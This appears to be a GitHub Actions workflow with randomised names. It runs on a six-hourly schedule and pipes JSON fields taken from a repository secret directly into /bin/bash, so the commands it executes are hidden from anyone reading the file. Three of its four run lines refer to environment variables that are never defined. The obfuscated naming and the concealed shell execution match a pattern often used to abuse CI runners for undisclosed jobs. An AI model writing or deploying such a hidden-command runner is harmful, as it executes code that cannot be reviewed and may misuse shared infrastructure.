name: duanlinxi6718

on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:  # 10677
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanlinxi6718
        env:
          epimy126: ${{ secrets.epimy126 }}
        run: |
          echo $epimy126 | jq -r .bkpp37031 | /bin/bash
          echo $ufzed7 | jq -r .togh2 | /bin/bash
          echo $gw194 | jq -r .pfm80265 | /bin/bash
          echo $gyqam5367 | jq -r .tnagp32880 | /bin/bash

